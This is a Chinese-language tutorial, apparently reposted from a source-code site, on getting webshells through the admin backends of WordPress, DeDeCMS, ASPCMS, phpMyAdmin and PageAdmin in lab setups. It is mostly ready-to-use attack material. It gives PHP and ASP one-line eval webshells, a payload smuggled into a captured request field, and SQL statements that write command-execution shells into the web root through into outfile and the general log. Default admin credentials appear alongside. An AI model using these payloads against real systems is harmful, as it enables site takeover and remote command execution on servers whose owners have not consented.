目录
步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...
步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php
步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...
步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)
步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包
步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...
步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。
步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】
一:WordPress
步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...
#执行命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://192.168.4.176:8080/wp-admin/
步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php
在其404模板中插入一句话木马代码.点击【更新文件】按钮
<?php eval($ POST['cmd']);?>
步骤三:访问以下连接即可获取WebShel...
#拼接路径
/wp-content/themes/twentyfifteen/404.php
#访问连接
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
菜刀连接:
姿势二:上传主题拿WebShell
步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】
主题文件
步骤二:安装成功后访问主题下的网站后门文件..
#拼接路径
/wp-content/themes/ Farallon-develop-v0.3.8/shell.php
#访问地址
http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php
#蚁剑连接
二:DeDeCMS
漏洞复现
姿势一:通过文件管理器上传WebShell
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
#前台
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1
#后台
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/
#信息
username:admin
password:admin
步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
码上传...OK
步骤三:访问上传成功后的文件并使用蚁剑连接测试...
#文件地址
http://127.0.0.1/uploads/uploads/shell.php
http://127.0.0.1/uploads/uploads/shell.php
http://127.0.0.1/uploads/uploads/shell.php
姿势二:修改模板文件拿WebShel
步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...
步骤三:使用蚁剑进行连接测试.
#地址
http://127.0.0.1/uploads/index.php
http://127.0.0.1/uploads/index.php
http://127.0.0.1/uploads/index.php
姿势三:后台任意命令执行拿WebShell
步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
http://127.0.0.1/dedecms/plus/ad js.php?aid=1
步骤三:使用蚁剑连接测试...
三:ASPCMS
ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
漏洞复现
姿势一:后台修改配置文件拿Shell
步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)
#网站后台
http://192.168.4.139/admin_aspcms/login.asp //全功能版本
#账户密码
username:admin
password:123456
步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包
步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...
#字段值
1%25><%25Eval(Request(chr(65)))%25><%25 #密码是a
#影响文件
/config/AspCms _Config.asp
步骤四:访问以下地址进行连接...
http://192.168.207.130:81/config//AspCms_Config.asp
四、PHPMyadmin
姿势⼀:通过⽇志⽂件拿Shell
利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取⼀个webshell 。
show global variables like '%general%';
set global general_log='on';
set global general_log_file = 'E:/phpstudy_pro/WWW/mafa.php'
select '<?php phpinfo();?>';
php代码执行成功!
姿势⼆:导⼊导出拿WebShell
思路:通过SQL语句拿webshell ⽤into outfile把后⻔写到⽹站⽬录上。
1.首先判断mysql位置
select @@datadir
路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\
2.猜测web路径
猜测web路径: E:\phpstudy_pro\WWW
E:\phpstudy\WWW\web.php
3.写webshell
select "<?php phpinfo(); eval($_POST[a]);?>" into outfile 'E:/phpstudy_pro/WWW/a.php ';
select "<?php phpinfo(); system($_GET[a]);?>" into outfile 'E:/phpstudy_pro/WWW/b.php';
4.浏览器
http://127.0.0.1/b.php?a=dir ..\
备注:/
不要用\,如里要用\\(转义)
姿势三:界面图像化GetShell
如果过滤了 into outfile 第一种的图形化操作..
phpmyadmin管理台
变量:日志 搜索:gen
log:on
file: E:/phpstudy_pro/WWW/mafa.php
sql:
select “<?php eval($_POST[‘cmd’]);?>”;
五、Pageadmin
PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。
源码⽂件+MSSQL(SA/Rsec123456)
登录到管理员后台
步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。
步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】
步骤三:解压文件。
步骤四:使用工具连接。
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » 常见CMS漏洞(WordPress、DeDeCMS、ASPCMS、PHPMyadmin、Pageadmin)
发表评论 取消回复